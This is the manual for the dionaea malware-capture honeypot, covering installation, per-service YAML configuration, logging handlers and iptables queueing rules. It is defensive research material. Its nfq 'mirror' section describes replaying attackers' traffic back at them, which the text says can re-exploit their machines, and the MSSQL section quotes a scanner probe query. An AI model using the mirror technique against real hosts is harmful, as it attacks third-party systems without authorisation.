dionaea - Man Page

dionaea intention is to trap malware exploiting vulnerabilities exposed by services offered to a network, the ultimate goal is gaining a copy of the malware.

As Software is likely to have bugs, bugs in software offering network services can be exploitable, and dionaea is software offering network services, it is likely dionaea has exploitable bugs.

Of course we try to avoid it, but if nobody would fail when trying hard, we would not need software such as dionaea.

So, in order to minimize the impact, dionaea can drop privileges, and chroot.

To be able to run certain actions which require privileges, after dionaea dropped them, dionaea creates a child process at startup, and asks the child process to run actions which require elevated privileges. This does not guarantee anything, but it should be harder to get gain root access to the system from an unprivileged user in a chroot environment.

Given the softwares intended use, network io is crucial. All network io is within the main process in a so called non-blocking manner. To understand nonblocking, imagine you have many pipes infront of you, and these pipes can send you something, and you can put something into the pipe. If you want to put something into a pipe, while it is crowded, you’d have to wait, if you want to get something from a pipe, and there is nothing, you’d have to wait too. Doing this pipe game non-blocking means you won’t wait for the pipes to be write/readable, you’ll get something off the pipes once data arrives, and write once the pipe is not crowded. If you want to write a large chunk to the pipe, and the pipe is crowded after a small piece, you note the rest of the chunk you wanted to write, and wait for the pipe to get ready.

DNS resolves are done using libudns, which is a neat non-blocking dns resolving library with support for AAAA records and chained cnames. So much about non-blocking.

dionaea uses libev to get notified once it can act on a socket, read or write.

dionaea can offer services via tcp/udp and tls for IPv4 and IPv6, and can apply rate limiting and accounting limits per connections to tcp and tls connections - if required.

For best performance and functionality we have documented some recommendations for running dionaea.

At the moment we do not recommend using Ubtuntu 20.04 or Debian 11 because libemu has been dropped from the package repository. Feel free to have a look at Future of shellcode emulation (libemu)? for more information and to help use.

You can download the source code from the release page or by using the git command.

git clone https://github.com/DinoTools/dionaea.git
cd dionaea

We provide an official docker image. For detailed instructions please have a look at the dinotools/dionaea docker hub page

Before you start download the source code of dionaea.

Install required build dependencies before configuring and building dionaea. (‘ttf-liberation’ required to ‘util/gnuplotsql.py’)

sudo apt-get install \
    build-essential \
    cmake \
    check \
    cython3 \
    libcurl4-openssl-dev \
    libemu-dev \
    libev-dev \
    libglib2.0-dev \
    libloudmouth1-dev \
    libnetfilter-queue-dev \
    libnl-3-dev \
    libpcap-dev \
    libssl-dev \
    libtool \
    libudns-dev \
    python3 \
    python3-dev \
    python3-bson \
    python3-yaml \
    python3-boto3 \
    fonts-liberation

After all dependencies have been installed successfully create a build directory and run cmake to setup the build process.

mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX:PATH=/opt/dionaea ..

Now you should be able to run make to build and run make install to install the honeypot.

make
sudo make install

The new honeypot can be found in the directory /opt/dionaea.

The packages below are 3rd party provided, which is appreciated. If you have compiled a package for your own distribution, just send me the link or make a pull request.

NOTE:

Before you use 3rd party packages please check if you get the latest version of dionaea.

NOTE:

We are not responsible and it is hard to debug if you use 3rd party packages. If you have any issues with the packages please also contact the package maintainer.

pyev

The pyev functions used in the shipped modules have been replaced with new classes. This effects the Timer() class. If you have custom code and it uses the pyev Timer() class, please upgrade your code before running it in production.

Config

• IPv4 mapped IPv6 is now disabled by default

Path

During the steps from autotools to cmake nearly all log and data directories have been changed. But it should be possible to keep the old config files and also use the old directories.

Assuming dionaea 0.7.0 and 0.8.0 have been installed into `/opt/dionaea`

• /opt/dionaea/var/dionaea/binaries/ /opt/dionaea/var/lib/dionaea/binaries/
• /opt/dionaea/var/dionaea/bistreams/ -> /opt/dionaea/var/lib/dionaea/bistreams/
• /opt/dionaea/var/dionaea/dionaea.db -> /opt/dionaea/var/lib/dionaea/dionaea.db
• /opt/dionaea/var/dionaea/dionaea.json -> /opt/dionaea/var/lib/dionaea/dionaea.json
• /opt/dionaea/var/dionaea/dionaea.log -> /opt/dionaea/var/log/dionaea/dionaea.log
• /opt/dionaea/var/dionaea/dionaea.sqlite -> /opt/dionaea/var/lib/dionaea/dionaea.sqlite
• /opt/dionaea/var/dionaea/dionaea_incident.json -> /opt/dionaea/var/lib/dionaea/dionaea_incident.json
• /opt/dionaea/var/dionaea/dionaea-errors.log -> /opt/dionaea/var/log/dionaea/dionaea-errors.log
• /opt/dionaea/var/dionaea/downloads.f2b -> /opt/dionaea/var/lib/dionaea/fail2ban/downloads.f2b
• /opt/dionaea/var/dionaea/offers.f2b -> /opt/dionaea/var/lib/dionaea/fail2ban/offers.f2b
• /opt/dionaea/var/dionaea/roots/ftp/ -> /opt/dionaea/var/lib/dionaea/ftp/root/
• /opt/dionaea/var/dionaea/roots/tftp/ -> /opt/dionaea/var/lib/dionaea/tftp/root/
• /opt/dionaea/var/dionaea/roots/upnp/ -> /opt/dionaea/var/lib/dionaea/upnp/root/
• /opt/dionaea/var/dionaea/roots/www/ -> /opt/dionaea/var/lib/dionaea/www/root/
• /opt/dionaea/var/dionaea/share/python/http/template/ -> /opt/dionaea/var/lib/dionaea/http/template/
• /opt/dionaea/var/dionaea/sipaccounts.sqlite -> /opt/dionaea/var/lib/dionaea/sip/accounts.sqlite
• /opt/dionaea/var/dionaea/vtcache.sqlite -> /opt/dionaea/var/lib/dionaea/vtcache.sqlite

download.dir

Global download directory used by some ihandlers.

listen.mode:

There are basically three modes how dionaea can bind the services to IP addresses.

• getifaddrs - auto

  This will get a list of all IP addresses of all available interfaces and bind the services to each IP. It is also possible to specify a list of interfaces to use by using the listen.interfaces parameter.

• manual - your decision

  In this mode you have to specify an additional parameter listen.addresses. This is a comma separated list of IP addresses dionaea should bind the services to.

• nl, will require a list of interfaces

  You have to specify a comma separated list of interfaces names with the listen.interfaces parameter. If an IP address is added to an interfaces or removed from an interface dionaea will lunch or stop all services for this IP.

modules

Comma separated list of modules.

processors

Comma separated list of processors.

ssl.default.c

Two letter id of the Country.

ssl.default.cn

The Common Name/domain name of the generated SSL/TLS certificate.

ssl.default.o

The Organization name.

ssl.default.ou

The name of the Organizational Unit.

dionaea has a general application log. This logs are ment to be used for debugging and to track errors. It is not recommended to analyse this files to track attacks.

filename

The filename of the logfile.

levels

Only log messages that match the specified log level get logged to the logfile.

Available log levels:

• debug
• info
• warning
• error
• critical
• all = Special log level including all log levels

Examples:

Log only messages with level warning and error

errors.levels=warning,error

Log all log messages but exclude messages with log level debug

errors.levels=all,-debug

domain

Only log messages in a specified domain.

Only modules specified by the modules value in the dionaea section are loaded during the start up.

Every module might have its own config section with additional config parameters. The section name consists of the prefix module and the module name speratated by a dot(.).

See the Modules documentation to find more information on how to configure the modules.

The specified processors will be used as an entry point in the processing pipeline. In most cases the initial processor will be a filter processor <processor/filter>. The next processor in the pipeline is specified by the next parameter.

See the Processors documentation to find more information on how to configure the processors.

The DTAG Community Honeypot Project has been started in 2010 by a small group of enthusiasts of the Deutsche Telekom. They are maintaining T-Pot a Multi-Honeypot Platform. It is based on well established honeypots including dionaea.

• Website: DTAG Community Honeypot Project
• Status: active

DionaeaFR is a web-frontend to display attack information. It uses the SQLite database provided by the log_sqlite ihandler.

• Website: DionaeaFR
• Status: unmaintained since 2014

You can use the log_json incident handler in combination with an ELK stack to collect, aggregate and visualize attack information.

• Website: ELK stack
• Status: active

A tool to deploy honeypots, collect attack information and display aggregated statistics.

• Website: Modern Honey Network
• Status: active, but deploys an pre 0.2(2014) version of dionaea by default.

The curl module is used to transfer files from and to servers, it is used to download files via http as well as submitting files to 3rd parties.

The emu module is used to detect, profile and - if required - execute shellcode.

The pcap module uses the libpcap library to detect rejected connection attempts, so even if we do not accept a connection, we can use the information somebody wanted to connect there.

The python module allows using the python interpreter in dionaea, and allows controlling some scripts dionaea uses

The black hole module can be used to bind a service to a port. The service does not respond to any submitted data. But the bistreams can be used to create new modules.

services/blackhole.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: blackhole
  config:
    services:
      # Telnet
      - port: 23
        protocol: tcp

      # DNS
      - port: 53
        protocol: udp
      - port: 53
        protocol: tcp

      # NTP
      - port: 123
        protocol: udp

services/epmap.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: epmap

Dionaea provives a basic ftp server on port 21, it can create directories and upload and download files. From my own experience there are very little automated attacks on ftp services and I’m yet to see something interesting happening on port 21.

services/ftp.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: ftp
  config:
    root: "@DIONAEA_STATEDIR@/ftp/root"
    response_messages:
      welcome_msg: 220 DiskStation FTP server ready.

Dionaea supports http on port 80 as well as https, but there is no code making use of the data gathered on these ports. For https, the self-signed ssl certificate is created at startup.

Example configuration:

- name: http
  config:
    root = "var/dionaea/wwwroot"

default_headers

Default header fields are send if none of the other header patterns match.

global_headers

Global header fields are added to all response headers.

headers

List of header fields to be used in the response header. Only applied if filename_pattern, status_code and methods match. The first match in the list is used.

max_request_size

Maximum size in kbytes of the request. 32768 = 32MB

root

The root directory so serve files from.

services/http.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: http
  config:
    # Root directory to look for files
    root: "@DIONAEA_STATEDIR@/http/root"
    ports:
      - 80
    ssl_ports:
      - 443
    max_request_size: 32768 # maximum size in kbytes of the request (32MB)
    # Set default Content-Type if unable to detect
    # default_content_type: text/html; charset=utf-8
    # Max number of fields to extract from GET request (Python >= 3.8)
    # get_max_num_fields: 100
    # List of default headers
    # default_headers:
    #   - ["Content-Type", "{content_type}"]
    #   - ["Content-Length", "{content_length}""]
    #   - ["Connection", "{connection}"]
    # Try to detect the Content-Type by using the filename
    # detect_content_type: true
    global_headers:
      - ["Server", "nginx"]
    # Add additional headers to the response. First match wins.
    # filename_pattern - is a regex if matched the headers are set
    # headers - a list of HTTP headers to set
    #           the order matters, use to simulate your webserver as good as possible
    headers:
      - filename_pattern: ".*\\.php"
        headers:
          - ["Content-Type", "text/html; charset=utf-8"]
          - ["Content-Length", "{content_length}"]
          - ["Connection", "{connection}"]
          - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
    # If enabled, try to handle some SOAP requests
    # soap_enabled: false
    template:
      # set to true to enable template processing
      # this feature requires jinja2 template engine http://jinja.pocoo.org/
      enabled: false
      file_extension: .j2
      path: "@DIONAEA_STATEDIR@/http/template/nginx"
      templates:
        autoindex:
          filename: autoindex.html.j2
        error_pages:
          - filename: error.html.j2
          # - filename: error/{code}.html.j2
      # used to specify additional template values
      values:
        # full_name: nginx/1.1

Set the Server response field.

- name: http
  config:
    global_headers:
      - ["Server", "nginx"]

Define headers to use if the filename matches a pattern.

- name: http
  config:
    headers:
      - filename_pattern: ".*\\.php"
        headers:
          - ["Content-Type", "text/html; charset=utf-8"]
          - ["Content-Length", "{content_length}"]
          - ["Connection", "{connection}"]
          - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]

It is possible to use Jinja templates to customise the content returned by dionaea.

Requirements:

• Jinja

Before any template is used the template processing has to be enabled in the config file. Some global templates (e.g. for error pages) are specified in the config file. To use the template function in a static file just place it under the content root directory and add the template file extension as specified with the file_extension.

Example:

• you have a file called my-app.html
• to enabled template processing rename the file to my-app.html.j2
• now you can use template strings

Template values:

• connection is an instance of HTTP connection class
• values is a Dictionary of additional template values specified in the config

Demo:

Have a look at our demo template and play with it in your test lab before releasing it into the wild.

http/root/form.html.j2

<html>
    <head>
        <title>Demo</title>
    </head>
    <body>
        <h1>Form GET</h1>
        <form action="{{ connection.header.path }}" method="get">
            <label for="text1">Text</label>
            <input type="text" name="text" id="text1"/>

            <label for="password1">Password</label>
            <input type="password" name="password" id="password1"/>

            <button type="submit">Send</button>
        </form>
        <h1>Form POST</h1>
        <form action="{{ connection.header.path }}" method="post">
            <label for="text2">Text</label>
            <input type="text" name="text" id="text2"/>

            <label for="password2">Password</label>
            <input type="password" name="password" id="password2"/>

            <button type="submit">Send</button>
        </form>
        <h1>Form POST - multipart/form-data</h1>
        <form action="{{ connection.header.path }}" enctype="multipart/form-data" method="post">
            <label for="text3">Text</label>
            <input type="text" name="text" id="text3"/>

            <label for="password3">Password</label>
            <input type="password" name="password" id="password3"/>

            <label for="file3">File</label>
            <input type="file" name="file" id="file3"/>

            <button type="submit">Send</button>
        </form>
        <h1>Results</h1>
        <pre>
Get Values
{% for name, value in connection.request_fields|dictsort %}
{{ name }} = {{ value[0] }}
{% endfor %}
Form values
{% if connection.request_form %}
{% for name in connection.request_form.keys() %}
{% if connection.request_form[name].filename %}
{{ name }} = file with name '{{ connection.request_form[name].filename }}'
{% else %}
{{ name }} = {{ connection.request_form[name].value }}
{% endif %}
{% endfor %}
{% endif %}
        </pre>

    </body>
</html>

Dionaea can emulate a very basic memcached server.

services/memcache.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: memcache

services/mirror.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: mirror

This module add initial support to emulates a MongoDB server with the dionaea honeypot. At the moment it is very limited and the functionality might be improved in one of the next releases.

• bson module for Python 3

services/mongo.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: mongo

services/mqtt.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: mqtt

This module implements the Tabular Data Stream protocol which is used by Microsoft SQL Server. It listens to tcp/1433 and allows clients to login. It can decode queries run on the database, but as there is no database, dionaea can’t reply, and there is no further action. Typically we always get the same query:

exec sp_server_info 1 exec sp_server_info 2 exec sp_server_info 500 select 501,NULL,1 where 'a'='A' select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id set textsize 2147483647 set arithabort on

Refer to the blog <http://carnivore.it/2010/09/11/mssql_attacks_examined> for more information. Patches would be appreciated.

services/mssql.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: mssql

This module implements the MySQL wire stream protocol - backed up by sqlite as database. Please refer to 2011-05-15 Extending Dionaea <http://carnivore.it/2011/05/15/extending_dionaea> for more information.

services/mysql.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: mysql
  config:
    databases:
      information_schema:
        path: ":memory:"
      # example how to extend this
      # just provide a databasename and path to the database
      # the database can be altered by attackers, so ... better use a copy
#      psn:
#        path: "/path/to/cc_info.sqlite"

The python nfq script is the counterpart to the nfq module. While the nfq module interacts with the kernel, the nfq python script takes care of the required steps to start a new service on the ports. nfq can intercept incoming tcp connections during the tcp handshake giving your honeypot the possibility to provide service on ports which are not served by default.

As dionaea can not predict which protocol will be spoken on unknown ports, neither implement the protocol by itself, it will connect the attacking host on the same port, and use the attackers server side protocol implementation to reply to the client requests of the attacker therefore dionaea can end up re?exploiting the attackers machine, just by sending him the exploit he sent us.

The technique is a brainchild of Tillmann Werner, who used it within his honeytrap <http://honeytrap.carnivore.it> honeypot. Legal boundaries to such behaviour may be different in each country, as well as ethical boundaries for each individual. From a technical point of view it works, and gives good results. Learning from the best, I decided to adopt this technique for dionaea. Besides the legal and ethical issues with this approach, there are some technical things which have to be mentioned

port scanning

recursive-self-connecting

Assume some shellcode or download instructions makes dionaea to

• connect itself on a unbound port
• nfq intercepts the attempt
• spawns a service
• accepts the connection #1
• creates mirror connection for connection #1 by connecting the remotehost (itself) on the same port #2
• accepts connection #2 as connection #3
• creates mirror connection for connection #3 by connecting the remotehost (itself) on the same port #4
• …

Such recursive loop, has to be avoided for obvious reasons. Therefore dionaea checks if the remote host connecting a nfq mirror is a local address using ‘getifaddrs’ and drops local connections.

So much about the known problems and workarounds …

If you read that far, you want to use it despite the technical/legal/ethical problems. So … You’ll need iptables, and you’ll have to tell iptables to enqueue packets which would establish a new connection. I recommend something like this:

iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5

Explanation:

1. ACCEPT all connections to existing services
2. enqueue all other packets to the NFQUEUE

If you have dionaea running on your NAT router, I recommend something like:

iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE

Explanation:

1. ACCEPT all connections to existing services in mangle::PREROUTING
2. MARK all other packets
3. if we see these marked packets on INPUT, queue them

Using something like:

iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5

will enqueue /all/ SYN packets to the NFQUEUE, once you stop dionaea you will not even be able to connect to your ssh daemon.

Even if you add an exemption for ssh like:

iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE

dionaea will try to create a new service for /every/ incoming connection, even if there is a service running already. As it is easy to avoid this, I recommend sticking with the recommendation. Besides the already mention throttle settings, there are various timeouts for the nfq mirror service in the config. You can control how long the service will wait for new connections (/timeouts.server.listen/), and how long the mirror connection will be idle (/timeouts.client.idle/) and sustain (/timeouts.client.sustain/).

services/pptp.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: pptp
  config:
# Cisco PIX
#    firmware_revision: 4608
#    hostname:
#    vendor_name: Cisco Systems

# DrayTek
#    firmware_revision: 1
#    hostname: Vigor
#    vendor_name: DrayTek

# Linux
#    firmware_revision: 1
#    hostname: local
#    vendor_name: linux

# Windows
#    firmware_revision: 0
#    hostname:
#    vendor_name: Microsoft

# MikroTik router
#    firmware_revision: 1
#    hostname: MikroTik
#    vendor_name: MikroTik

Dionaea provides a basic PJL/PCL printer server on port 9100. It can receive prints and PRET works with it. Most messages can be overridden using the configuration file, please refer to the pjl_default_responses dictionary for all available messages.

- name: printer
  config:
    root: "var/lib/printer/root"
    pjl_msgs:
        info_id: "HP LASERJET 5ML"

When connecting to a printer using PRET, one may inspect the filesystem. By creating folders in the configured printer root (var/lib/printer/root above), they’ll be usable from the PRET shell.

PRET by default checks the info_filesys command, which needs to be adjusted to match your setup. The default configuration assumes there’s a volume called 0.

This is a VoIP module for the honeypot dionaea. The VoIP protocol used is SIP since it is the de facto standard for VoIP today. In contrast to some other VoIP honeypots, this module doesn’t connect to an external VoIP registrar/server. It simply waits for incoming SIP messages (e.g. OPTIONS or even INVITE), logs all data as honeypot incidents and/or binary data dumps (RTP traffic), and reacts accordingly, for instance by creating a SIP session including an RTP audio channel. As sophisticated exploits within the SIP payload are not very common yet, the honeypot module doesn’t pass any code to dionaea’s code emulation engine. This will be implemented if we spot such malicious messages. The main features of the VoIP module are:

• Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)
• Support for multiple SIP sessions and RTP audio streams
• Record all RTP data (optional)
• Set custom SIP username and secret (password)
• Set custom useragent to mimic different phone models
• Uses dionaea’s incident system to log to SQL database

A personality defines how to handle a request. At least the ‘default’ personality MUST exist. The following options are available per personality.

serve

A list of IP addresses to use this personality for.

handle

List of SIP methods to handle.

You can easily add, change or remove users by editing the SQLite file specified by the ‘users = “”’ parameter in the config file. All users are specified in the users table.

username

Specifies the name of the user. This value is treated as regular expression. See Python: Regular Expressions <http://docs.python.org/py3k/library/re.html> for more information.

password

The password.

personality

The user is only available in the personality specified by this value. You can define a personality in the config file.

pickup_delay_min

This is an integer value. Let the phone ring for at least this number of seconds.

pickup_delay_max

This is an integer value. Maximum number of seconds to wait before dionaea picks up the phone.

action

This value isn’t in use, yet.

sdp

The name of the SDP to use. See table ‘sdp’.

All SDPs can be defined in the sdp table in the users database.

name

Name of the SDP

sdp

The value to use as SDP

The following values are available in the SDP definition.

{addrtype}

Address type. (IP4 or IP6)

{unicast_address}

RTP address

{audio_port}

Dionaea audio port.

{video_port}

Dionaea video port.

The following control parameters are available in the SDP definition.

[audio_port]…content…[/audio_port]

The content is only available in the output if the audio_port value is set.

[video_port]…content…[/video_port]

The content is only available in the output if the video_port value is set.

Example:

v=0
o=- 1304279835 1 IN {addrtype} {unicast_address}
s=SIP Session
c=IN {addrtype} {unicast_address}
t=0 0
[audio_port]
m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
a=sendrecv
a=rtpmap:111 Speex/16000/1
a=fmtp:111 sr=16000,mode=any
a=rtpmap:0 PCMU/8000/1
a=rtpmap:8 PCMA/8000/1
a=rtpmap:9 G722/8000/1
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16,32,36
a=rtpmap:120 NSE/8000
a=fmtp:120 192-193
[/audio_port]
[video_port]
m=video {video_port} RTP/AVP 34 96 97
c=IN {addrtype} {unicast_address}
a=rtpmap:34 H263/90000
a=fmtp:34 QCIF=2
a=rtpmap:96 H263-1998/90000
a=fmtp:96 QCIF=2
a=rtpmap:97 H263-N800/90000
[/video_port]

services/sip.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: sip
  config:
    udp_ports:
      - 5060
    tcp_ports:
      - 5060
    tls_ports:
      - 5061
    users: "@DIONAEA_STATEDIR@/sip/accounts.sqlite"
    rtp:
      enable: true
      # how to dump the rtp stream
      # bistream = dump as bistream
      modes:
        - bistream
        - pcap
      pcap:
        path: "@DIONAEA_STATEDIR@/sip/rtp/{personality}/%Y-%m-%d/"
        filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
    personalities:
      default:
        domain: "localhost"
        name: "softphone"
        personality: "generic"
#      next-server:
#        domain: "my-domain"
#        name: "my server"
#        personality: "generic"
#        serve: ["10.0.0.1"]
#        default_sdp: "default"
#        handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]

    actions:
      bank-redirect:
        do: "redirect"
        params:
      play-hello:
        do: "play"
        params:
          file: "var/dionaea/.../file.ext"

The main protocol offerd by dionaea is SMB. SMB has a decent history of remote exploitable bugs, and is a very popular target for worms. dionaeas SMB implementation makes use of an python3 adapted version of scapy. As scapys own version of SMB was pretty limited, almost everything but the Field declarations had to be rewritten. The SMB emulation written for dionaea is used by the mwcollectd <http://code.mwcollect.org> low interaction honeypot too. Besides the known attacks on SMB dionaea supports uploading files to smb shares. Adding new DCE remote procedure calls is a good start to get into dionaea code, you can use:

SELECT
        COUNT(*),
        dcerpcrequests.dcerpcrequest_uuid,
        dcerpcservice_name,
        dcerpcrequest_opnum
FROM
        dcerpcrequests
        JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
        LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
WHERE
        dcerpcserviceop_name IS NULL
GROUP BY
        dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
ORDER BY
        COUNT(*) DESC;

to identify potential usefull targets of unknown dcerpc calls using the data you gathered and stored in your logsql database. Patches are appreciated.

The default port is 445; it can be changed via the port stanza.

services/smb.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: smb
  config:

    ## Generic setting ##

    # 1:"Windows XP Service Pack 0/1",
    # 2:"Windows XP Service Pack 2",
    # 3:"Windows XP Service Pack 3",
    # 4:"Windows 7 Service Pack 1",
    # 5:"Linux Samba 4.3.11"
#    os_type: 2

     # Additional config
#    primary_domain: Test
#    oem_domain_name: Test
#    server_name: TEST-SERVER

     ## Windows 7 ##
#    native_os: Windows 7 Professional 7600
#    native_lan_manager: Windows 7 Professional 6.1
#    shares:
#      ADMIN$:
#        comment: Remote Admin
#        path: C:\\Windows
#        type: disktree
#      C$:
#        comment: Default Share
#        path: C:\\
#        type:
#          - disktree
#          - special
#      IPC$:
#        comment: Remote IPC
#        type: ipc
#      Printer:
#        comment: Microsoft XPS Document Writer
#        type: printq

     ## Samba ##
#    native_os: Windows 6.1
#    native_lan_manager: Samba 4.3.11
#    shares:
#      admin:
#        comment: Remote Admin
#        path: \\home\\admin
#        type: disktree
#      share:
#        comment: Default Share
#        path: \\share
#        type: disktree
#      IPC$:
#        comment: Remote IPC
#        path: IPC Service
#        type: ipc
#      Printer:
#        comment: Printer Drivers
#        type: printq

Written to test the udp connection code, dionaea provides a tftp server on port 69, which can serve files. Even though there were vulnerabilities in tftp services, I’m yet to see an automated attack on tftp services.

services/tftp.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: tftp
  config:
    root: "@DIONAEA_STATEDIR@/tftp/root"

services/upnp.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: upnp
  config:
    root: "@DIONAEA_STATEDIR@/upnp/root"
    # maximum size in kbytes of the request (32MB)
    max_request_size: 32768
    personality:
      # default
      cache:    "CACHE-CONTROL: max-age=120\r\n"
      st:       "ST: upnp:rootdevice\r\n"
      usn:      "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
      server:   "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
      location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
      opt:      "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
#      # Samsung TV
#      cache:     "CACHE-CONTROL: max-age=900\r\n"
#      st:        "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
#      usn:       "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
#      server:    "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
#      location:  "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
#      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
#
#      # XBOX 360
#      cache:     "CACHE-CONTROL: max-age=1800\r\n"
#      st:        "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
#      usn:       "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
#      server:    "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
#      location:  "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
#      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"

ihandlers/emuprofile.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: emuprofile

ihandlers/fail2ban.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: fail2ban
  config:
    downloads: "@DIONAEA_STATEDIR@/fail2ban/downloads.f2b"
    offers: "@DIONAEA_STATEDIR@/fail2ban/offers.f2b"

ihandlers/ftp.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

# ftp client section
- name: ftp
  config:
    # host for active ftp via NAT
    # * 0.0.0.0 - the initiating connection ip is used for active ftp
    # * not 0.0.0.0 - gets resolved as hostname and used
    active_host: "0.0.0.0"

    # ports for active ftp; string indicating a range
    active_ports: 63001-64000

ihandlers/hpfeeds.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: hpfeeds
  config:
    # fqdn/ip and port of the hpfeeds broker
    server: "hpfriends.honeycloud.net"
    # port: 10000
    ident: ""
    secret: ""
    # dynip_resolve: enable to lookup the sensor ip through a webservice
    dynip_resolve: "http://hpfriends.honeycloud.net/ip"
    # Try to reconnect after N seconds if disconnected from hpfeeds broker
    # reconnect_timeout: 10.0

WARNING:

This ihanlder is experimental.

This incident handler can write interesting information about attacks and connections into an SQL database. It uses SQLAlchemy to support different databases.

ihandlers/log_db_sql.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: log_db_sql
  config:
    url: sqlite:///@DIONAEA_STATEDIR@/dionaea.db

This ihandler can be used to export incidents in realtime to be processed by external programs.

WARNING:

handlers

List of URLs to submit the information to. At the moment only file, http and https are supported.

{
   "name": "<sensor-name>",
   "origin": "<name of the incident>",
   "timestamp": "<date in ISO 8601>",
   "data": {
      "connection": {
         "id": <internal ID>,
         "local_ip": "<local IP>",
         "local_port": <local port>,
         "remote_ip": "<remote IP>",
         "remote_hostname": "<remote hostname if resolvable>",
         "remote_port": <remote port>,
         "protocol": "<protocol>",
         "transport": "<transport tcp|udp>"
      }
   }
}

ihandlers/log_incident.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: log_incident
  config:
    handlers:
      #- http://127.0.0.1:8080/
      - file://@DIONAEA_STATEDIR@/dionaea_incident.json

This ihandler can submit information about attacks/connections encoded as json.

WARNING:

flat_data

Set to true to flatten object lists.

handlers

List of URLs to submit the information to. At the moment only file, http and https are supported.

Format of the connection information:

{
    "connection": {
        "local": {
            "address": "<string:local ip address>",
            "port": <integer:local port>,
        },
        "protocol": "<string:service name e.g. httpd>",
        "remote": {
            "address": "<string:remote ip address>",
            "port": <integer:remote port>,
            "hostname": "<string:hostname of the remote host>"
        },
        "transport": "<string:transport protocol e.g. tcp or udp>",
        "type": "<string:connection type e.g. accepted, listen, ...>"
    }
}

ihandlers/log_json.yaml

# SPDX-FileCopyrightText: none
# SPDX-License-Identifier: CC0-1.0

- name: log_json
  config:
    # Uncomment next line to flatten object lists to work with ELK
    # flat_data: true
    handlers:
      #- http://127.0.0.1:8080/
      - file://@DIONAEA_STATEDIR@/dionaea.json

WARNING:

This ihandler was renamed in dionaea 0.4.0 from logsql to log_sqlite.

This is what the logsql python script does, it is an ihandler, and writes interesting incidents to a sqlite database, one of the benefits of this logging is the ability to cluster incidents based on the initial attack when retrieving the data from the database:

connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
